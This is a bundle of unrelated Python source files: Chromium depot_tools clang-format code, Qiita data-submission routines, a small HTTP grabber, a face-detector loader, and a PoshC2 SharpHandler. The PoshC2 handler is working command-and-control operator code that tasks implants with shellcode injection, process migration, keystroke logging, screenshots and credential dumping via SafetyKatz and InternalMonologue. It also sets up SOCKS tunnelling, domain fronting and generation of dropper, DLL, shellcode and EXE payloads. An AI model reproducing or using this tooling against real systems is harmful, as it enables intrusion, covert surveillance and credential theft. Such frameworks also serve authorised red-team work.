parser.add_option('--dry-run', action='store_true',
help='Don\'t modify any file on disk.')
parser.add_option('--diff', action='store_true',
help='Print diff to stdout rather than modifying files.')
opts, args = parser.parse_args(args)
# git diff generates paths against the root of the repository. Change
# to that directory so clang-format can find files even within subdirs.
rel_base_path = settings.GetRelativeRoot()
if rel_base_path:
os.chdir(rel_base_path)
# Generate diff for the current branch's changes.
diff_cmd = ['diff', '--no-ext-diff', '--no-prefix']
if opts.full:
# Only list the names of modified files.
diff_cmd.append('--name-only')
else:
# Only generate context-less patches.
diff_cmd.append('-U0')
# Grab the merge-base commit, i.e. the upstream commit of the current
# branch when it was created or the last time it was rebased. This is
# to cover the case where the user may have called "git fetch origin",
# moving the origin branch to a newer commit, but hasn't rebased yet.
upstream_commit = None
cl = Changelist()
upstream_branch = cl.GetUpstreamBranch()
if upstream_branch:
upstream_commit = RunGit(['merge-base', 'HEAD', upstream_branch])
upstream_commit = upstream_commit.strip()
if not upstream_commit:
DieWithError('Could not find base commit for this branch. '
'Are you in detached state?')
diff_cmd.append(upstream_commit)
# Handle source file filtering.
diff_cmd.append('--')
if args:
for arg in args:
if os.path.isdir(arg):
diff_cmd += [os.path.join(arg, '*' + ext) for ext in CLANG_EXTS]
elif os.path.isfile(arg):
diff_cmd.append(arg)
else:
DieWithError('Argument "%s" is not a file or a directory' % arg)
else:
diff_cmd += ['*' + ext for ext in CLANG_EXTS]
diff_output = RunGit(diff_cmd)
top_dir = os.path.normpath(
RunGit(["rev-parse", "--show-toplevel"]).rstrip('\n'))
# Locate the clang-format binary in the checkout
try:
clang_format_tool = clang_format.FindClangFormatToolInChromiumTree()
except clang_format.NotFoundError, e:
DieWithError(e)
if opts.full:
# diff_output is a list of files to send to clang-format.
files = diff_output.splitlines()
if not files:
print "Nothing to format."
return 0
cmd = [clang_format_tool]
if not opts.dry_run and not opts.diff:
cmd.append('-i')
stdout = RunCommand(cmd + files, cwd=top_dir)
if opts.diff:
sys.stdout.write(stdout)
else:
env = os.environ.copy()
env['PATH'] = str(os.path.dirname(clang_format_tool))
# diff_output is a patch to send to clang-format-diff.py
try:
script = clang_format.FindClangFormatScriptInChromiumTree(
'clang-format-diff.py')
except clang_format.NotFoundError, e:
DieWithError(e)
cmd = [sys.executable, script, '-p0']
if not opts.dry_run and not opts.diff:
cmd.append('-i')
stdout = RunCommand(cmd, stdin=diff_output, cwd=top_dir, env=env)
if opts.diff:
sys.stdout.write(stdout)
if opts.dry_run and len(stdout) > 0:
return 2
return 0
def CMDlol(parser, args):
# This command is intentionally undocumented.
print zlib.decompress(base64.b64decode(
'eNptkLEOwyAMRHe+wupCIqW57v0Vq84WqWtXyrcXnCBsmgMJ+/SSAxMZgRB6NzE'
'E2ObgCKJooYdu4uAQVffUEoE1sRQLxAcqzd7uK2gmStrll1ucV3uZyaY5sXyDd9'
'JAnN+lAXsOMJ90GANAi43mq5/VeeacylKVgi8o6F1SC63FxnagHfJUTfUYdCR/W'
'Ofe+0dHL7PicpytKP750Fh1q2qnLVof4w8OZWNY'))
return 0
class OptionParser(optparse.OptionParser):
"""Creates the option parse and add --verbose support."""
def __init__(self, *args, **kwargs):
optparse.OptionParser.__init__(
self, *args, prog='git cl', version=__version__, **kwargs)
self.add_option(
'-v', '--verbose', action='count', default=0,
help='Use 2 times for more debugging info')
def parse_args(self, args=None, values=None):
options, args = optparse.OptionParser.parse_args(self, args, values)
levels = [logging.WARNING, logging.INFO, logging.DEBUG]
logging.basicConfig(level=levels[min(options.verbose, len(levels) - 1)])
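# e.g. plain 'git cl <cmd>' logs at WARNING, '-v' at INFO and '-v -v' (or more) at DEBUG.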
return options, args
def main(argv):
if sys.hexversion < 0x02060000:
print >> sys.stderr, (
'\nYour python version %s is unsupported, please upgrade.\n' %
sys.version.split(' ', 1)[0])
return 2
# Reload settings.
global settings
settings = Settings()
colorize_CMDstatus_doc()
dispatcher = subcommand.CommandDispatcher(__name__)
try:
return dispatcher.execute(OptionParser(), argv)
except urllib2.HTTPError, e:
if e.code != 500:
raise
DieWithError(
('AppEngine is misbehaving and returned HTTP %d, again. Keep faith '
'and retry or visit go/isgaeup.\n%s') % (e.code, str(e)))
if __name__ == '__main__':
# These affect sys.stdout so do it outside of main() to simplify mocks in
# unit testing.
fix_encoding.fix_encoding()
colorama.init()
sys.exit(main(sys.argv[1:]))
|
xuyuhan/depot_tools
|
git_cl.py
|
Python
|
bsd-3-clause
| 106464
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join, isdir
from shutil import rmtree
from tarfile import open as taropen
from tempfile import mkdtemp
from os import environ
from traceback import format_exc
from moi.job import system_call
from qiita_db.artifact import Artifact
from qiita_db.logger import LogEntry
from qiita_core.qiita_settings import qiita_config
from qiita_ware.ebi import EBISubmission
from qiita_ware.exceptions import ComputeError, EBISubmissionError
def submit_EBI(preprocessed_data_id, action, send):
"""Submit a preprocessed data to EBI
Parameters
----------
preprocessed_data_id : int
The preprocesssed data id
action : %s
The action to perform with this data
send : bool
True to actually send the files
"""
# step 1: init and validate
ebi_submission = EBISubmission(preprocessed_data_id, action)
# step 2: generate demux fastq files
ebi_submission.study.ebi_submission_status = 'submitting'
try:
ebi_submission.generate_demultiplexed_fastq()
except:
error_msg = format_exc()
if isdir(ebi_submission.full_ebi_dir):
rmtree(ebi_submission.full_ebi_dir)
ebi_submission.study.ebi_submission_status = 'failed: %s' % error_msg
LogEntry.create('Runtime', error_msg,
info={'ebi_submission': preprocessed_data_id})
raise
# step 3: generate and write xml files
ebi_submission.generate_xml_files()
if send:
# step 4: sending sequences
if action != 'MODIFY':
old_ascp_pass = environ.get('ASPERA_SCP_PASS', '')
environ['ASPERA_SCP_PASS'] = qiita_config.ebi_seq_xfer_pass
LogEntry.create('Runtime',
("Submitting sequences for pre_processed_id: "
"%d" % preprocessed_data_id))
try:
for cmd in ebi_submission.generate_send_sequences_cmd():
try:
stdout, stderr, _ = system_call(cmd)
except Exception as e:
stdout = ''
stderr = str(e)
le = LogEntry.create(
'Fatal', "Command: %s\nError: %s\n" % (cmd,
str(e)),
info={'ebi_submission': preprocessed_data_id})
ebi_submission.study.ebi_submission_status = (
"failed: ASCP submission, log id: %d" % le.id)
raise ComputeError("EBI Submission failed! Log id: "
"%d" % le.id)
finally:
open(ebi_submission.ascp_reply, 'a').write(
'stdout:\n%s\n\nstderr: %s' % (stdout, stderr))
finally:
environ['ASPERA_SCP_PASS'] = old_ascp_pass
LogEntry.create('Runtime',
('Submission of sequences of pre_processed_id: '
'%d completed successfully' %
preprocessed_data_id))
# step 5: sending xml and parsing answer
xmls_cmds = ebi_submission.generate_curl_command()
LogEntry.create('Runtime',
("Submitting XMLs for pre_processed_id: "
"%d" % preprocessed_data_id))
try:
xml_content, stderr, _ = system_call(xmls_cmds)
except Exception as e:
xml_content = ''
stderr = str(e)
le = LogEntry.create(
'Fatal', "Command: %s\nError: %s\n" % (cmd, str(e)),
info={'ebi_submission': preprocessed_data_id})
ebi_submission.study.ebi_submission_status = (
"failed: XML submission, log id: %d" % le.id)
raise ComputeError("EBI Submission failed! Log id: %d" % le.id)
else:
LogEntry.create('Runtime',
('Submission of XMLs of pre_processed_id: '
'%d completed successfully' %
preprocessed_data_id))
finally:
open(ebi_submission.curl_reply, 'w').write(
'stdout:\n%s\n\nstderr: %s' % (xml_content, stderr))
try:
st_acc, sa_acc, bio_acc, ex_acc, run_acc = \
ebi_submission.parse_EBI_reply(xml_content)
except EBISubmissionError as e:
le = LogEntry.create(
'Fatal', "Command: %s\nError: %s\n" % (xml_content, str(e)),
info={'ebi_submission': preprocessed_data_id})
ebi_submission.study.ebi_submission_status = (
"failed: XML parsing, log id: %d" % le.id)
raise ComputeError("EBI Submission failed! Log id: %d" % le.id)
ebi_submission.study.ebi_submission_status = 'submitted'
if action == 'ADD':
if st_acc:
ebi_submission.study.ebi_study_accession = st_acc
if sa_acc:
ebi_submission.sample_template.ebi_sample_accessions = sa_acc
if bio_acc:
ebi_submission.sample_template.biosample_accessions = bio_acc
if ex_acc:
ebi_submission.prep_template.ebi_experiment_accessions = ex_acc
ebi_submission.artifact.ebi_run_accessions = run_acc
else:
st_acc, sa_acc, bio_acc, ex_acc, run_acc = None, None, None, None, None
return st_acc, sa_acc, bio_acc, ex_acc, run_acc
def submit_VAMPS(artifact_id):
"""Submit artifact to VAMPS
Parameters
----------
artifact_id : int
The artifact id
Raises
------
ComputeError
- If the artifact cannot be submitted to VAMPS
- If the artifact is associated with more than one prep template
"""
artifact = Artifact(artifact_id)
if not artifact.can_be_submitted_to_vamps:
raise ComputeError("Artifact %d cannot be submitted to VAMPS"
% artifact_id)
study = artifact.study
sample_template = study.sample_template
prep_templates = artifact.prep_templates
if len(prep_templates) > 1:
raise ComputeError(
"Multiple prep templates associated with the artifact: %s"
% artifact_id)
prep_template = prep_templates[0]
# Also need to check that is not submitting (see item in #1523)
if artifact.is_submitted_to_vamps:
raise ValueError("Cannot resubmit artifact %s to VAMPS!" % artifact_id)
# Generating a tgz
targz_folder = mkdtemp(prefix=qiita_config.working_dir)
targz_fp = join(targz_folder, '%d_%d_%d.tgz' % (study.id,
prep_template.id,
artifact_id))
targz = taropen(targz_fp, mode='w:gz')
# adding sample/prep
samp_fp = join(targz_folder, 'sample_metadata.txt')
sample_template.to_file(samp_fp)
targz.add(samp_fp, arcname='sample_metadata.txt')
prep_fp = join(targz_folder, 'prep_metadata.txt')
prep_template.to_file(prep_fp)
targz.add(prep_fp, arcname='prep_metadata.txt')
# adding preprocessed data
for _, fp, fp_type in artifact.filepaths:
if fp_type == 'preprocessed_fasta':
targz.add(fp, arcname='preprocessed_fasta.fna')
targz.close()
# submitting
cmd = ("curl -F user=%s -F pass='%s' -F uploadFile=@%s -F "
"press=UploadFile %s" % (qiita_config.vamps_user,
qiita_config.vamps_pass,
targz_fp,
qiita_config.vamps_url))
obs, _, _ = system_call(cmd)
exp = ("<html>\n<head>\n<title>Process Uploaded File</title>\n</head>\n"
"<body>\n</body>\n</html>")
if obs != exp:
return False
else:
artifact.is_submitted_to_vamps = True
return True
|
squirrelo/qiita
|
qiita_ware/commands.py
|
Python
|
bsd-3-clause
| 8365
|
import base64, re, traceback, os, string, subprocess
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from poshc2.client.Alias import cs_alias, cs_replace
from poshc2.Colours import Colours
from poshc2.server.AutoLoads import check_module_loaded, run_autoloads_sharp
from poshc2.client.Help import sharp_help, allhelp
from poshc2.server.Config import PoshInstallDirectory, PoshProjectDirectory, SocksHost, PayloadsDirectory, ModulesDirectory
from poshc2.server.Config import PayloadCommsHost, DomainFrontHeader, UserAgent, PBindPipeName, PBindSecret, FCommFileName
from poshc2.Utils import argp, load_file, gen_key, get_first_url, get_first_dfheader
from poshc2.server.Core import print_bad, print_good
from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import getpowerstatus
from poshc2.server.database.DB import new_task, kill_implant, get_implantdetails, get_sharpurls, get_baseenckey, get_powerstatusbyrandomuri
from poshc2.server.database.DB import select_item, update_label, get_allurls, get_c2server_all, get_newimplanturl, new_urldetails
def handle_sharp_command(command, user, randomuri, implant_id):
# alias mapping
for alias in cs_alias:
if alias[0] == command[:len(command.rstrip())]:
command = alias[1]
# alias replace
for alias in cs_replace:
if command.startswith(alias[0]):
command = command.replace(alias[0], alias[1])
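# Note on the two loops above: cs_alias entries only fire on an exact
# (whitespace-trimmed) match and swap in the whole replacement command, whereas
# cs_replace entries rewrite just the matching prefix of the input. For example,
# a hypothetical alias ('ps', '<full run-exe command>') would only trigger when
# 'ps' is typed on its own.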
original_command = command
command = command.strip()
run_autoloads_sharp(command, randomuri, user)
if command.startswith("searchhelp"):
do_searchhelp(user, command, randomuri)
return
elif command.startswith("searchallhelp"):
do_searchallhelp(user, command, randomuri)
return
elif command.startswith("searchhistory"):
do_searchhistory(user, command, randomuri)
return
elif command.startswith("upload-file"):
do_upload_file(user, command, randomuri)
return
elif command.startswith("inject-shellcode"):
do_inject_shellcode(user, command, randomuri)
return
elif command.startswith("migrate"):
do_migrate(user, command, randomuri)
return
elif command == "kill-implant" or command == "exit":
do_kill_implant(user, command, randomuri)
return
elif command == "sharpsocks":
do_sharpsocks(user, command, randomuri)
return
elif (command.startswith("stop-keystrokes")):
do_stop_keystrokes(user, command, randomuri)
return
elif (command.startswith("start-keystrokes")):
do_start_keystrokes(user, command, randomuri)
return
elif (command.startswith("get-keystrokes")):
do_get_keystrokes(user, command, randomuri)
return
elif (command.startswith("get-screenshotmulti")):
do_get_screenshotmulti(user, command, randomuri)
return
elif command.startswith("get-screenshot"):
do_get_screenshot(user, command, randomuri)
return
elif command == "getpowerstatus":
do_get_powerstatus(user, command, randomuri)
return
elif command == "stoppowerstatus":
do_stoppowerstatus(user, command, randomuri)
return
elif command.startswith("run-exe SharpWMI.Program") and "execute" in command and "payload" not in command:
do_sharpwmi_execute(user, command, randomuri)
return
elif (command.startswith("get-hash")):
do_get_hash(user, command, randomuri)
return
elif (command.startswith("enable-rotation")):
do_rotation(user, command, randomuri)
return
elif (command.startswith("safetykatz")):
do_safetykatz(user, command, randomuri)
return
elif command.startswith("loadmoduleforce"):
do_loadmoduleforce(user, command, randomuri)
return
elif command.startswith("loadmodule"):
do_loadmodule(user, command, randomuri)
return
elif command.startswith("listmodules"):
do_listmodules(user, command, randomuri)
return
elif command.startswith("modulesloaded"):
do_modulesloaded(user, command, randomuri)
return
elif command.startswith("pbind-connect"):
do_pbind_start(user, command, randomuri)
return
elif command.startswith("fcomm-connect"):
do_fcomm_start(user, command, randomuri)
return
elif command.startswith("dynamic-code"):
do_dynamic_code(user, command, randomuri)
return
elif command.startswith("startdaisy"):
do_startdaisy(user, command, randomuri)
return
elif command == "help":
do_help(user, command, randomuri)
return
else:
if command:
do_shell(user, original_command, randomuri)
return
def do_searchhelp(user, command, randomuri):
searchterm = (command).replace("searchhelp ", "")
helpful = sharp_help.split('\n')
for line in helpful:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_searchallhelp(user, command, randomuri):
searchterm = (command).replace("searchallhelp ", "")
for line in allhelp:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_searchhistory(user, command, randomuri):
searchterm = (command).replace("searchhistory ", "")
with open('%s/.implant-history' % PoshProjectDirectory) as hisfile:
for line in hisfile:
if searchterm in line.lower():
print(Colours.GREEN + line.replace("+", ""))
def do_upload_file(user, command, randomuri):
# TODO lots of common code
source = ""
destination = ""
if command == "upload-file":
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
except KeyboardInterrupt:
return
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
destination = session.prompt("Location to upload to: ")
else:
args = argp(command)
source = args.source
destination = args.destination
try:
destination = destination.replace("\\", "\\\\")
print("")
print("Uploading %s to %s" % (source, destination))
uploadcommand = f"upload-file {source} {destination}"
new_task(uploadcommand, user, randomuri)
except Exception as e:
print("Error with source file: %s" % e)
traceback.print_exc()
def do_inject_shellcode(user, command, randomuri):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
try:
shellcodefile = load_file(path)
if shellcodefile is not None:
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
except Exception as e:
print("Error loading file: %s" % e)
def do_migrate(user, command, randomuri):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
implant = get_implantdetails(randomuri)
implant_arch = implant.Arch
implant_comms = implant.Pivot
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "C#":
path = "%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%sProxySharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
def do_kill_implant(user, command, randomuri):
impid = get_implantdetails(randomuri)
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID)
if ri.lower() == "n":
print("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
new_task("exit", user, randomuri)
kill_implant(randomuri)
def do_exit(user, command, randomuri):
return do_kill_implant(user, command, randomuri)
def do_sharpsocks(user, command, randomuri):
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurls = sharpurls.split(",")
sharpurl = select_item("PayloadCommsHost", "C2Server").replace('"', '').split(',')[0]
user_agent = select_item("UserAgent", "C2Server")
dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
print("\nIf using Docker, change the SocksHost to be the IP of the PoshC2 Server not 127.0.0.1:49031")
print("sharpsocks -t latest -s \"-c=%s -k=%s --verbose -l=http://*:%s\"\r" % (channel, sharpkey, SocksHost.split(":")[2]) + Colours.GREEN)
print("\nElse\n")
print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri == "":
if dfheader:
new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), dfheader, user_agent), user, randomuri)
else:
new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), user_agent), user, randomuri)
if ri.lower() == "y":
if dfheader:
new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), dfheader, user_agent), user, randomuri)
else:
new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), user_agent), user, randomuri)
print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def do_stop_keystrokes(user, command, randomuri):
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("", randomuri)
def do_start_keystrokes(user, command, randomuri):
check_module_loaded("Logger.exe", randomuri, user)
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("KEYLOG", randomuri)
def do_get_keystrokes(user, command, randomuri):
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
def do_get_screenshotmulti(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
update_label("SCREENSHOT", randomuri)
def do_get_screenshot(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
def do_get_powerstatus(user, command, randomuri):
getpowerstatus(randomuri)
new_task("run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri)
def do_stoppowerstatus(user, command, randomuri):
new_task(command, user, randomuri)
update_label("", randomuri)
def do_get_hash(user, command, randomuri):
check_module_loaded("InternalMonologue.exe", randomuri, user)
new_task("run-exe InternalMonologue.Program InternalMonologue", user, randomuri)
def do_safetykatz(user, command, randomuri):
new_task("run-exe SafetyKatz.Program %s" % command, user, randomuri)
def do_loadmoduleforce(user, command, randomuri):
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
def do_loadmodule(user, command, randomuri):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
def do_listmodules(user, command, randomuri):
modules = os.listdir(ModulesDirectory)
modules = sorted(modules, key=lambda s: s.lower())
print("")
print("[+] Available modules:")
print("")
for mod in modules:
if (".exe" in mod) or (".dll" in mod):
print(mod)
def do_modulesloaded(user, command, randomuri):
implant_details = get_implantdetails(randomuri)
print(implant_details.ModsLoaded)
new_task("listmodules", user, randomuri)
def do_help(user, command, randomuri):
print(sharp_help)
def do_shell(user, command, randomuri):
new_task(command, user, randomuri)
def do_rotation(user, command, randomuri):
domain = input("Domain or URL in array format: \"https://www.example.com\",\"https://www.example2.com\" ")
domainfront = input("Domain front URL in array format: \"fjdsklfjdskl.cloudfront.net\",\"jobs.azureedge.net\" ")
new_task("dfupdate %s" % domainfront, user, randomuri)
new_task("rotate %s" % domain, user, randomuri)
def do_sharpwmi_execute(user, command, randomuri):
style = Style.from_dict({'': '#80d130'})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
new_task("%s payload=%s" % (command, payload), user, randomuri)
else:
print_bad("Could not find file")
def do_pbind_start(user, command, randomuri):
key = get_baseenckey()
if len(command.split()) == 2: # 'pbind-connect <hostname>' is two args
command = f"{command} {PBindPipeName} {PBindSecret} {key}"
elif len(command.split()) == 4: # if the pipe name and secret are already present just add the key
command = f"{command} {key}"
else:
print_bad("Expected 'pbind_connect <hostname>' or 'pbind_connect <hostname> <pipename> <secret>'")
return
new_task(command, user, randomuri)
def do_fcomm_start(user, command, randomuri):
key = get_baseenckey()
if len(command.split()) == 1: # 'fcomm-connect' is one arg
command = f"{command} {FCommFileName} {key}"
elif len(command.split()) == 2: # if the file name is already there then just add the key
command = f"{command} {key}"
else:
print_bad("Expected 'fcomm_connect' or 'fcomm_connect <filename>'")
return
new_task(command, user, randomuri)
def do_dynamic_code(user, command, randomuri):
compile_command = "mono-csc %sDynamicCode.cs -out:%sPoshC2DynamicCode.exe -target:exe -warn:2 -sdk:4" % (PayloadsDirectory, PayloadsDirectory)
try:
subprocess.check_output(compile_command, shell=True)
except subprocess.CalledProcessError:
return
command = command.replace("dynamic-code", "").strip()
check_module_loaded(f"{PayloadsDirectory}PoshC2DynamicCode.exe", randomuri, user, force=True)
new_task(f"run-exe PoshC2DynamicCode.Program PoshC2DynamicCode {command}", user, randomuri)
def do_startdaisy(user, command, randomuri):
check_module_loaded("daisy.dll", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
cred_expiry = ""
if elevated.lower() == "n":
cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
default_df_header = get_first_dfheader(DomainFrontHeader)
if default_df_header == default_url:
default_df_header = None
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END)
domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END)
proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
cred_expiry = input(Colours.GREEN + "Password/Account Expiration Date, e.g. 15/03/2018: " + Colours.END)
if not upstream_url:
upstream_url = default_url
if not domain_front:
if default_df_header:
domain_front = default_df_header
else:
domain_front = ""
else:
upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
domain_front = upstream_daisy_host
urls = get_allurls().replace(" ", "")
useragent = UserAgent
command = f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" {upstream_url} \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry)
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers(name)
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
print_good("Created new %s daisy payloads" % name)
|
nettitude/PoshC2
|
poshc2/client/command_handlers/SharpHandler.py
|
Python
|
bsd-3-clause
| 21566
|
"""Grabber for collecting data"""
import urllib2
from random import sample
from veliberator.settings import PROXY_SERVERS
class Grabber(object):
"""Url encapsultation for making request throught HTTP"""
page = None
data = None
def __init__(self, url, proxies=PROXY_SERVERS):
"""Init the grabber"""
self.url = url
self.proxies = proxies
self.opener = self.build_opener()
def build_opener(self):
"""Build the url opener"""
handlers = []
if self.proxies:
server = sample(self.proxies, 1)[0]
handlers.append(urllib2.ProxyHandler({'http': server}))
return urllib2.build_opener(*handlers)
@property
def content(self):
"""Return the data grabbed"""
if self.data:
return self.data
try:
self.page = self.opener.open(self.url)
self.data = ''.join(self.page.readlines())
self.page.close()
return self.data
except:
return ''
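# Minimal usage sketch (hypothetical URL); with proxies=None no ProxyHandler is
# installed, and any fetch error is swallowed so content comes back as '':
#
#   grabber = Grabber('http://example.com/stations.xml', proxies=None)
#   xml_data = grabber.content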
|
Fantomas42/veliberator
|
veliberator/grabber.py
|
Python
|
bsd-3-clause
| 1041
|
import os
import numpy as np
import torch
from ..core import FaceDetector
class FolderDetector(FaceDetector):
'''This is a simple helper module that assumes the faces were detected already
(either previously or are provided as ground truth).
The class expects to find the bounding boxes in the same format used by
the rest of face detectors, namely ``list[(x1,y1,x2,y2),...]``.
For each image the detector will search for a file with the same name and with one of the
following extensions: .npy, .t7 or .pth
'''
def __init__(self, device, path_to_detector=None, verbose=False):
super(FolderDetector, self).__init__(device, verbose)
def detect_from_image(self, tensor_or_path):
# Only strings supported
if not isinstance(tensor_or_path, str):
raise ValueError
base_name = os.path.splitext(tensor_or_path)[0]
if os.path.isfile(base_name + '.npy'):
detected_faces = np.load(base_name + '.npy')
elif os.path.isfile(base_name + '.t7'):
detected_faces = torch.load(base_name + '.t7')
elif os.path.isfile(base_name + '.pth'):
detected_faces = torch.load(base_name + '.pth')
else:
raise FileNotFoundError
if not isinstance(detected_faces, list):
raise TypeError
